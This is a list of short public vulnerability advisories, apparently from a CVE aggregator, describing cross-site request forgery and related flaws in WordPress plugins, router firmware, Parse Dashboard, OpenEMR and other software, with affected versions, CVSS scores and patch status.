Cross-Site Request Forgery

Sl902-Swtgw124As Firmware versions up to 200.1.20 is affected by cross-site request forgery (csrf) (CVSS 4.3).

Stored XSS in osctrl-admin prior to version 0.5.0 allows low-privileged users with query permissions to inject malicious JavaScript into the on-demand query list, affecting all users who view the page. An attacker can exploit this vulnerability to steal CSRF tokens and impersonate other users, potentially compromising the entire platform if an administrator is compromised. A patch is available in version 0.5.0.

A vulnerability was detected in Chia Blockchain 2.1.0. Impacted is an unknown function of the file /send_transaction. [CVSS 3.1 LOW]

The Disable Admin Notices - Hide Dashboard Notifications WordPress plugin up to version 1.4.2 lacks proper CSRF protection in its `showPageContent()` function, allowing unauthenticated attackers to inject arbitrary URLs into the blocked redirects list by tricking site administrators into clicking a malicious link. This could enable an attacker to redirect site traffic or manipulate administrator settings without explicit authorization. No patch is currently available for this medium-severity vulnerability.

Talishar is a fan-made Flesh and Blood project. Prior to commit 6be3871a14c192d1fb8146cdbc76f29f27c1cf48, the Talishar application lacks Cross-Site Request Forgery (CSRF) protections on critical state-changing endpoints, specifically within `SubmitChat.php` and other game interaction handlers. [CVSS 2.6 LOW]

Parse Dashboard versions 7.3.0-alpha.42 through 9.0.0-alpha.7 fail to implement CSRF protection on the AI Agent API endpoint, allowing attackers to perform unauthorized actions through the endpoint by tricking authenticated dashboard users into visiting malicious web pages. An attacker can exploit this to manipulate Parse Server applications managed through the vulnerable dashboard without explicit user consent. No patch is currently available; users can mitigate by disabling the agent configuration in their dashboard settings.

Unauthenticated attackers can execute arbitrary read/write operations against Parse Server databases in Parse Dashboard versions 7.3.0-alpha.42 through 9.0.0-alpha.7 by exploiting multiple chained vulnerabilities in the opt-in AI Agent API endpoint, gaining master key access without authentication or authorization checks. This affects only dashboards with an agent configuration enabled, allowing complete database compromise. The vulnerability has no available patch at this time, though version 9.0.0-alpha.8 implements fixes including authentication, CSRF validation, and proper authorization controls.

OpenEMR prior to version 8.0.0 allows low-privileged users to export sensitive patient and medical data through the message_list.php report functionality due to missing access controls. The vulnerability affects receptionists and similar roles who can bypass authorization checks to extract entire message databases containing confidential information. Public exploit code exists for this issue, though a patch is available in version 8.0.0 and later.

Piwigo is an open source photo gallery application for the web. In versions on the 14.x branch, when installing, the secret_key configuration parameter is set to MD5(RAND()) in MySQL. [CVSS 7.5 HIGH]

Unauthorized configuration changes in Binardat 10G08-0800GSM network switches (firmware V300SP10260209 and prior) result from missing CSRF protections in the administrative interface. An attacker can craft a malicious request to trick an authenticated administrator into modifying switch settings without their knowledge or consent. No patch is currently available for this vulnerability.

Same-origin policy bypass in Firefox Networking JAR component before 148. Allows cross-origin data access through JAR protocol handling.

Bludit 3.16.1 lacks CSRF protections on administrative endpoints, allowing attackers to trick authenticated admins into uninstalling plugins or installing malicious themes via crafted web requests. Public exploit code exists for this vulnerability, enabling unauthorized modification of site functionality and potential code execution through untrusted theme installation.

Aruba HiSpeed Cache (aruba-hispeed-cache) WordPress plugin versions prior to 3.0.5 contain a cross-site request forgery (CSRF) vulnerability affecting multiple administrative AJAX actions.

The Tenda F3 Wireless Router firmware lacks CSRF protections in its administrative interface, enabling attackers to trick authenticated administrators into making unauthorized configuration changes through crafted requests. An unauthenticated attacker can exploit this to modify router settings by socially engineering an admin into visiting a malicious webpage. No patch is currently available for this vulnerability.

CollabPlatform's misconfigured CORS policy allows credentialed cross-origin requests from attacker-controlled domains, enabling unauthorized access to sensitive user account data including email addresses, account identifiers, and MFA status. All versions of the application are affected by this vulnerability, which remains unpatched and exploitable through simple web-based attacks requiring user interaction.

Arbitrary file upload in GetSimple CMS results from missing CSRF protection on the administrative upload endpoint, allowing an attacker to silently inject files through a malicious webpage visited by an authenticated admin. Public exploit code exists for this vulnerability, and no patch is currently available. An attacker needs only to trick an authenticated user into visiting a crafted page to compromise the application.

phpMoAdmin 1.1.5 contains a cross-site request forgery vulnerability that allows attackers to perform unauthorized database operations by crafting malicious requests. [CVSS 8.8 HIGH]

OrientDB 3.0.17 GA Community Edition contains cross-site request forgery vulnerabilities that allow attackers to perform unauthorized actions by crafting malicious requests to endpoints like /database/, /command/, and /document/. [CVSS 4.3 MEDIUM]

SvelteKit is a framework for rapidly developing robust, performant web applications using Svelte. Versions of @sveltejs/adapter-vercel prior to 6.3.2 are vulnerable to cache poisoning.

Web Site Management Server versions up to 16.7.0 is affected by cross-site request forgery (csrf) (CVSS 6.5).

OpenClaw versions prior to 2026.2.14 lack proper Cross-Origin Request Forgery (CSRF) protections on localhost mutation endpoints, allowing malicious websites to trigger unauthorized actions against a victim's local AI assistant instance such as opening tabs, modifying storage, or controlling browser functions. The vulnerability affects the browser control plane through cross-origin requests initiated from the victim's browser context, despite the service's loopback binding. Version 2026.2.14 and later mitigate this by validating Origin/Referer headers and rejecting mutating requests from cross-site origins.

WP Moose Kenta Companion kenta-companion is affected by cross-site request forgery (csrf) (CVSS 4.3).

ThimPress RealPress versions up to 1.1.0 are vulnerable to cross-site request forgery attacks that could allow attackers to perform unauthorized actions on behalf of authenticated users. An attacker can exploit this vulnerability by tricking users into visiting a malicious webpage, resulting in integrity and availability impacts. No patch is currently available for this vulnerability.

Themes4WP Popularis Extra popularis-extra is affected by cross-site request forgery (csrf) (CVSS 5.4).

themastercut Revision Manager TMC revision-manager-tmc is affected by cross-site request forgery (csrf) (CVSS 4.3).

Coachify versions 1.1.5 and earlier contain a cross-site request forgery vulnerability that allows unauthenticated attackers to perform unintended actions on behalf of authenticated users through crafted requests. An attacker can leverage this to modify user data or trigger unwanted functionality with user interaction. No patch is currently available for this vulnerability.

PublishPress PublishPress Revisions revisionary is affected by cross-site request forgery (csrf) (CVSS 5.4).

wpzita Zita Elementor Site Library zita-site-library is affected by cross-site request forgery (csrf) (CVSS 4.3).

Unauthenticated file upload in Gogs self-hosted Git service 0.13.4 and below. Default configuration exposes file upload endpoints. PoC and patch available.

Whatsiplus Scheduled Notification for Woocommerce (WordPress plugin) is affected by cross-site request forgery (csrf) (CVSS 4.3).

The Shield Security plugin for WordPress versions up to 21.0.8 contains a CSRF vulnerability that allows attackers to bypass nonce verification through a manipulated parameter, enabling SQL injection attacks to extract database contents. An unauthenticated attacker can exploit this by tricking a site administrator into clicking a malicious link, potentially compromising sensitive information stored in the WordPress database. No patch is currently available for affected installations.

The Remove Post Type Slug plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.2. This is due to incorrect nonce validation logic that uses OR (||) instead of AND (&&), causing the validation to fail when the nonce field is not empty OR when verification fails, rather than when it's empty AND verification fails. This makes it possible for unauthenticated attackers to modify the plugin's post type slug removal settings via a forged request ...

The Page Title, Description & Open Graph Updater plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.02. This is due to missing nonce validation on multiple AJAX actions including dieno_update_page_title. [CVSS 4.3 MEDIUM]

Country Blocker for AdSense (WordPress plugin) is affected by cross-site request forgery (csrf) (CVSS 4.3).

The NewsBlogger theme for WordPress is vulnerable to Cross-Site Request Forgery in versions 0.2.5.6 to 0.2.6.1. This is due to missing or incorrect nonce validation on the newsblogger_install_and_activate_plugin() function. [CVSS 8.8 HIGH]

Mailchimp List Subscribe Form (WordPress plugin) is affected by cross-site request forgery (csrf) (CVSS 4.3).

Hospital Management System versions up to 4.0 is affected by cross-site request forgery (csrf) (CVSS 6.5).

Cross-site request forgery (CSRF) in newbee-mall affects multiple endpoints, allowing unauthenticated remote attackers to perform unauthorized actions on behalf of authenticated users. Public exploit code exists for this vulnerability. No patch is currently available, and the project maintainers have not responded to the early disclosure notification.

Unauthenticated attackers can delete all pending comments in WordPress sites running the Dam Spam plugin up to version 1.0.8 by exploiting missing CSRF protections, requiring only that an administrator be tricked into clicking a malicious link. An attacker with this capability can disrupt comment moderation workflows and potentially suppress legitimate user feedback. No patch is currently available for this vulnerability.

The WP Plugin Info Card plugin for WordPress versions up to 6.2.0 contains a cross-site request forgery vulnerability in its AJAX handler due to disabled nonce validation, allowing unauthenticated attackers to create or modify custom plugin entries if a site administrator can be tricked into clicking a malicious link. An attacker could leverage this to inject arbitrary plugin configurations that could be used for further compromise of the WordPress installation. No patch is currently available.

Keybase.io Verification (WordPress plugin) is affected by cross-site request forgery (csrf) (CVSS 4.3).

Db2 Recovery Expert versions up to 5.5.0 is affected by cross-site request forgery (csrf) (CVSS 6.5).

IBM Concert 1.0.0 through 2.1.0 for Z hub component is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. [CVSS 6.5 MEDIUM]

Gym Management System versions up to 1.0 is affected by cross-site request forgery (csrf) (CVSS 3.5).

The WP Quick Contact Us plugin for WordPress through version 1.0 lacks proper nonce validation in its settings update function, enabling unauthenticated attackers to modify plugin configuration through cross-site request forgery if a site administrator can be tricked into clicking a malicious link. This could allow attackers to alter plugin behavior and potentially compromise site functionality without direct authentication.

The LatePoint - Calendar Booking Plugin for Appointments and Events plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 5.2.5. [CVSS 4.3 MEDIUM]

The MDirector Newsletter plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.5.8. This is due to missing nonce verification on the mdirectorNewsletterSave function. [CVSS 4.3 MEDIUM]

Unauthorized event deletion in the WordPress SEATT plugin through version 1.5.0 stems from inadequate CSRF protections on the event removal function. An attacker can trick site administrators into clicking a malicious link to remove arbitrary events without authentication. No patch is currently available for this vulnerability.

FastGPT's web and HTTP data acquisition nodes fail to properly validate internal network addresses, allowing unauthenticated remote attackers to bypass network isolation controls and access sensitive internal resources. This vulnerability affects FastGPT versions prior to 4.14.7 and requires user interaction to exploit. The vulnerability has a CVSS score of 5.4 and currently has no available patch.

Avideo versions up to 8.1 is affected by weak password recovery mechanism for forgotten password (CVSS 5.3).

AVideo Platform 8.1 contains a cross-site request forgery vulnerability that allows attackers to reset user passwords by exploiting the password recovery mechanism. [CVSS 5.3 MEDIUM]

FlexNet Publisher 11.12.1 contains a cross-site request forgery vulnerability that allows attackers to create administrative user accounts without authentication. [CVSS 4.0 MEDIUM]

Proctorio Chrome Extension is a browser extension used for online proctoring. The extension contains multiple window.addEventListener('message', ...) handlers that do not properly validate the origin of incoming messages. [CVSS 3.6 LOW]

The MMA Call Tracking WordPress plugin through version 2.3.15 lacks proper CSRF protection on its admin configuration page, allowing attackers to modify call tracking settings by tricking site administrators into clicking malicious links. An unauthenticated attacker can alter plugin configurations without authorization through forged requests. No patch is currently available for this vulnerability.

HP OfficeJet Pro printers (D9l18a, D9l20a, D9l21a, D9l63a firmware) are vulnerable to information disclosure through CORS misconfiguration when administrators enable the feature on the Embedded Web Server. An unauthenticated remote attacker can exploit this to access sensitive device resources from untrusted web origins. CORS remains disabled by default as a mitigation, but organizations that have explicitly enabled it should apply patches when available.

Kanboard versions prior to 1.2.50 contain a CSRF vulnerability in the ProjectPermissionController that accepts text/plain content instead of enforcing application/json, enabling attackers to modify project user roles through malicious forms. An authenticated admin visiting a malicious website could be tricked into unknowingly changing role assignments, potentially granting unauthorized access to projects. Public exploit code exists for this vulnerability, though a patch is available in version 1.2.50 and later.

Placipy 1.0.0 fails to implement CSRF protections while permitting credentialed cross-origin requests, allowing unauthenticated attackers to perform unauthorized actions on behalf of logged-in users through malicious websites. An attacker can exploit this vulnerability to modify placement records, access sensitive educational data, or compromise institutional operations without user knowledge. No patch is currently available.

Go Fiber web framework before 2.52.11 has a weak PRNG vulnerability (on Go < 1.24) that makes session tokens predictable, enabling session hijacking.

A vulnerability has been found in FAST/TOOLS provided by Yokogawa Electric Corporation. This product is vulnerable to Cross-Site Request Forgery (CSRF). [CVSS 5.4 MEDIUM]

The TITLE ANIMATOR plugin for WordPress lacks CSRF protection on its settings page, allowing unauthenticated attackers to modify plugin configuration through forged requests if a site administrator clicks a malicious link. This vulnerability affects all versions up to 1.0 and requires social engineering to exploit but poses a direct integrity risk to plugin functionality and site configuration.

Business Live Chat Software 1.0 contains a cross-site request forgery vulnerability that allows attackers to change user account roles without authentication. [CVSS 5.3 MEDIUM]

Wing FTP Server versions prior to 6.2.7 contain a cross-site request forgery (CSRF) vulnerability in the web administration interface that allows attackers to delete admin users. [CVSS 4.3 MEDIUM]

The Code Snippets WordPress plugin through version 3.9.4 lacks nonce validation on cloud snippet operations, allowing unauthenticated attackers to conduct cross-site request forgery attacks against logged-in administrators. By tricking an admin into visiting a malicious page, attackers can force unauthorized downloads or updates of cloud snippets. No patch is currently available for this vulnerability.

Ew-7438Rpn Mini Firmware versions up to 1.27 is affected by cross-site request forgery (csrf) (CVSS 8.1).

HRSALE 1.1.8 contains a cross-site request forgery vulnerability that allows attackers to add unauthorized administrative users through the employee registration form. [CVSS 4.3 MEDIUM]

Exagate SYSGuard 6001 contains a cross-site request forgery vulnerability that allows attackers to create unauthorized admin accounts through a crafted HTML form. [CVSS 5.3 MEDIUM]

P5 FNIP-8x16A FNIP-4xSH 1.0.20 contains a cross-site request forgery vulnerability that allows attackers to perform administrative actions without user interaction. [CVSS 3.5 LOW]

Axigen Mail Server before 10.5.57 and 10.6.x before 10.6.26 contains a Cross-Site Request Forgery (CSRF) vulnerability in the WebAdmin interface through improper handling of the _s (breadcrumb) parameter. The application accepts state-changing requests via the GET method and automatically processes base64-encoded commands queued in the _s parameter immediately after administrator authentication. Attackers can craft malicious URLs that, when clicked by administrators, execute arbitrary adminis...

Log Analysis versions 1.3.5.0 versions up to 1.3.8.3 is affected by cross-site request forgery (csrf) (CVSS 4.3).

lcg0124 BootDo is susceptible to cross-site request forgery (CSRF) attacks due to insufficient request validation, allowing remote attackers to perform unauthorized actions on behalf of authenticated users. Public exploit code exists for this vulnerability, though no patch is currently available. The rolling release model used by this product complicates version tracking for affected and patched instances.

Qwik versions prior to 1.12.0 contain a regular expression parsing error in the isContentType function that allows attackers to bypass Content-Type validation through crafted headers. An attacker can exploit this to perform cross-site request forgery (CSRF) attacks by manipulating how the application interprets request content types. A patch is available in version 1.12.0.

Qwik is a performance focused javascript framework. [CVSS 5.9 MEDIUM]

Ew-7438Rpn Mini Firmware versions up to 1.13 is affected by cross-site request forgery (csrf) (CVSS 5.3).

Maian Support Helpdesk 4.3 contains a cross-site request forgery vulnerability that allows attackers to create administrative accounts without authentication. [CVSS 5.3 MEDIUM]

Tenda AC7 firmware through V03.03.03.01_cn lacks CSRF protections on administrative web functions, enabling attackers to trick authenticated administrators into executing unauthorized configuration changes. An unauthenticated attacker can craft malicious requests that, when visited by an admin, modify router settings without their knowledge or consent. No patch is currently available.

Aion versions up to 2.0 contains a vulnerability that allows attackers to cookies to be sent in cross-site requests, potentially increasing exposure to cr (CVSS 4.6).

The Open eClass platform (formerly known as GUnet eClass) is a complete course management system. [CVSS 6.5 MEDIUM]

DotNetNuke 9.5 contains a persistent cross-site scripting vulnerability that allows normal users to upload malicious XML files with executable scripts through journal tools. [CVSS 6.4 MEDIUM]

Blair Williams ThirstyAffiliates thirstyaffiliates is affected by cross-site request forgery (csrf) (CVSS 5.4).

UsersWP plugin versions 1.2.53 and earlier contain a CSRF vulnerability that enables attackers to perform unauthorized actions on behalf of authenticated users without their knowledge. An attacker can craft malicious requests to modify user data or settings through a victim's browser session. No patch is currently available for this vulnerability.

Unauthenticated attackers can perform Cross-Site Request Forgery (CSRF) attacks against users of Enter Addons version 2.3.2 and earlier, potentially modifying victim data through unwanted actions. The vulnerability requires user interaction to succeed but carries no authentication barriers, allowing attackers to forge requests that alter application state. No patch is currently available to remediate this issue.

wp.insider Simple Membership WP user Import simple-membership-wp-user-import is affected by cross-site request forgery (csrf) (CVSS 5.4).

Copyscape Copyscape Premium copyscape-premium is affected by cross-site request forgery (csrf) (CVSS 4.3).

Sigmize through version 0.0.9 contains a cross-site request forgery vulnerability that allows unauthenticated attackers to perform unintended actions on behalf of authenticated users. The flaw requires user interaction but could enable unauthorized modifications or state changes within the application. No patch is currently available.

magepeopleteam WpEvently mage-eventpress is affected by cross-site request forgery (csrf) (CVSS 4.3).

Unauthenticated attackers can perform unauthorized actions on WRC-X1500GS-B and WRC-X1500GSA-B routers through cross-site request forgery attacks that exploit the lack of CSRF protections. An attacker can trick authenticated users into visiting a malicious webpage that silently executes unwanted commands on the affected device. No patch is currently available.

Unauthenticated attackers can forge requests to create or modify contact notes in WordPress Mail Mint plugin versions up to 1.19.2 by exploiting missing CSRF protections, requiring only that a site administrator clicks a malicious link. The lack of input validation on these operations enables stored XSS attacks that could compromise administrator accounts and site integrity. No patch is currently available.

PolarLearn versions 0-PRERELEASE-15 and earlier lack proper state parameter validation in OAuth 2.0 authentication, enabling attackers to conduct login CSRF attacks against GitHub and Google login flows. An attacker can pre-authenticate a victim's session and trick them into logging into the attacker's account, causing the victim's data and academic progress to be stored on the attacker's account instead. Public exploit code exists for this vulnerability, and a patch is available.

Missing CSRF protection in Tuleap's Overview inconsistent items feature allows authenticated attackers to trick users into performing unwanted actions via crafted requests, potentially leading to unauthorized artifact link creation and data manipulation. The vulnerability affects multiple Tuleap versions and has been patched in Community Edition 17.0.99.1768924735 and Enterprise Edition 17.2-5, 17.1-6, and 17.0-9. This requires user interaction and valid credentials but poses a moderate risk to Tuleap deployments.

An unauthenticated remote attacker is able to use an existing session id of a logged in user and gain full access to the device if configuration via ethernet is enabled. [CVSS 8.8 HIGH]